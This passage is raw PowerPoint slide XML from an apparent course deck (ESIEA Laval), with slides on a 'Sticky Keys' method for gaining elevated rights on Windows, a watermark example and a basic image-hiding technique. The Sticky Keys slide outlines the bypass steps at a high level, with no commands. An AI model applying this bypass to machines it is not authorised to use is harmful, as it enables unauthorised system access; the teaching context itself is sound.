          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="object 10"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6165070" y="12638854"/>
            <a:ext cx="5798470" cy="179536"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="25168">
              <a:lnSpc>
                <a:spcPts val="1367"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr spc="-50" dirty="0"/>
              <a:t>ESIEA </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-69" dirty="0"/>
              <a:t>Laval </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-129" dirty="0"/>
              <a:t>– </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-69" dirty="0"/>
              <a:t>Nicolas</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="89" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-59" dirty="0"/>
              <a:t>Bodin</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="object 11"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="7"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="13054948" y="12638854"/>
            <a:ext cx="4167651" cy="179536"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="50335">
              <a:lnSpc>
                <a:spcPts val="1367"/>
              </a:lnSpc>
            </a:pPr>
            <a:fld id="{81D60167-4931-47E6-BA6A-407CBD079E47}" type="slidenum">
              <a:rPr spc="-129" dirty="0"/>
              <a:pPr marL="50335">
                <a:lnSpc>
                  <a:spcPts val="1367"/>
                </a:lnSpc>
              </a:pPr>
              <a:t>39</a:t>
            </a:fld>
            <a:r>
              <a:rPr spc="-129" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="89" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-69" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-129" dirty="0"/>
              <a:t>49</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Rectangle 11"/>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extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="828180273"/>
      </p:ext>
    </p:extLst>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39837" y="1147825"/>
            <a:ext cx="7861934" cy="14604"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="7861934" h="14605">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7861363" y="14224"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="38100">
            <a:solidFill>
              <a:srgbClr val="808080"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="object 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9144000" cy="116242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0"/>
            <a:ext cx="9144000" cy="1162429"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="9144000" h="3429000">
                <a:moveTo>
                  <a:pt x="0" y="3429000"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9144000" y="3429000"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9144000" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="3429000"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="9525">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="object 7"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="920432" y="145287"/>
            <a:ext cx="7303134" cy="923330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="6000" spc="-5" dirty="0"/>
              <a:t>DAY 1</a:t>
            </a:r>
            <a:endParaRPr sz="6000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="TextBox 9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="76200" y="1324136"/>
            <a:ext cx="9025571" cy="4524315"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>STICKY KEYS METHOD</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>This was a term immediately throw up</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>	Some may of heard of sticky keys?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>	it is in windows as an accessibility helper (Hold Shift or press it 5 times)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>	This can be exploited in windows to gain higher rights</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>	VERY QUICK OVERVIEW</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1657350" lvl="3" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Crash windows on start</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1657350" lvl="3" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>eventually you can repair</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1657350" lvl="3" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>You will get a CMD screen</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1657350" lvl="3" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Edit the sticky exe</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1657350" lvl="3" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>This will now give access to CMD at all times</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1657350" lvl="3" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="1657350" lvl="3" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>There are many routes to edit your rights</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4"/>
          <a:srcRect l="41109" t="19759" r="38703" b="42868"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6324600" y="4114800"/>
            <a:ext cx="2590800" cy="2590800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3132912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4748" y="102655"/>
            <a:ext cx="1045688" cy="182999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="25168"/>
            <a:r>
              <a:rPr sz="1189" spc="-109" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>1.</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1189" spc="-89" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1189" spc="-89" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:hlinkClick r:id="rId2" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>Introduction</a:t>
            </a:r>
            <a:endParaRPr sz="1189">
              <a:latin typeface="Verdana"/>
              <a:cs typeface="Verdana"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="object 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7512484" y="102655"/>
            <a:ext cx="1073371" cy="182999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="25168"/>
            <a:r>
              <a:rPr sz="1189" spc="-30" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>A.</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1189" spc="-99" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1189" spc="-89" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:hlinkClick r:id="rId3" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>Introduction</a:t>
            </a:r>
            <a:endParaRPr sz="1189">
              <a:latin typeface="Verdana"/>
              <a:cs typeface="Verdana"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="object 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="549738" y="682125"/>
            <a:ext cx="3389989" cy="426912"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="25168"/>
            <a:r>
              <a:rPr sz="2774" spc="-99" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1E536D"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Examples </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2774" spc="-208" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1E536D"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2774" spc="99" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1E536D"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2774" spc="-89" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1E536D"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Watermark</a:t>
            </a:r>
            <a:endParaRPr sz="2774">
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="object 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2073044" y="1880022"/>
            <a:ext cx="4993932" cy="3745448"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill>
            <a:blip r:embed="rId4" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="object 6"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6165070" y="12638854"/>
            <a:ext cx="5798470" cy="179536"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="25168">
              <a:lnSpc>
                <a:spcPts val="1367"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr spc="-50" dirty="0"/>
              <a:t>ESIEA </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-69" dirty="0"/>
              <a:t>Laval </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-129" dirty="0"/>
              <a:t>– </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-69" dirty="0"/>
              <a:t>Nicolas</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="89" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-59" dirty="0"/>
              <a:t>Bodin</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="object 7"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="7"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="13054948" y="12638854"/>
            <a:ext cx="4167651" cy="179536"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="50335">
              <a:lnSpc>
                <a:spcPts val="1367"/>
              </a:lnSpc>
            </a:pPr>
            <a:fld id="{81D60167-4931-47E6-BA6A-407CBD079E47}" type="slidenum">
              <a:rPr spc="-129" dirty="0"/>
              <a:pPr marL="50335">
                <a:lnSpc>
                  <a:spcPts val="1367"/>
                </a:lnSpc>
              </a:pPr>
              <a:t>40</a:t>
            </a:fld>
            <a:r>
              <a:rPr spc="-129" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="89" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-69" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-129" dirty="0"/>
              <a:t>49</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rectangle 7"/>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extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3599013645"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition>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24000"/>
            <a:ext cx="6553200" cy="4914900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="object 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9144000" cy="990600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill>
            <a:blip r:embed="rId3" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="object 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9144000" cy="990600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill>
            <a:blip r:embed="rId3" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="object 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1239837" y="1147825"/>
            <a:ext cx="7861934" cy="14604"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="7861934" h="14605">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7861363" y="14224"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="38100">
            <a:solidFill>
              <a:srgbClr val="808080"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="object 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9144000" cy="1162429"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill>
            <a:blip r:embed="rId4" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="object 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9144000" cy="1162429"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="9144000" h="3429000">
                <a:moveTo>
                  <a:pt x="0" y="3429000"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9144000" y="3429000"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9144000" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="3429000"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="9525">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="object 7"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="920432" y="145287"/>
            <a:ext cx="7303134" cy="923330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="12700" algn="ctr"/>
            <a:r>
              <a:rPr lang="en-GB" sz="6000" kern="0" spc="-5" dirty="0">
                <a:solidFill>
                  <a:sysClr val="windowText" lastClr="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DAY 3</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="6000" kern="0" dirty="0">
              <a:solidFill>
                <a:sysClr val="windowText" lastClr="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="TextBox 9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7162800" y="1324136"/>
            <a:ext cx="1938971" cy="1754326"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>This image uses a very basic hiding technique</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Open up notepad</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>……</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="843010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5" name="object 3"/>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6" name="object 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1239837" y="1147825"/>
            <a:ext cx="7861934" cy="14604"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="7861934" h="14605">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7861363" y="14224"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="38100">
            <a:solidFill>
              <a:srgbClr val="808080"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
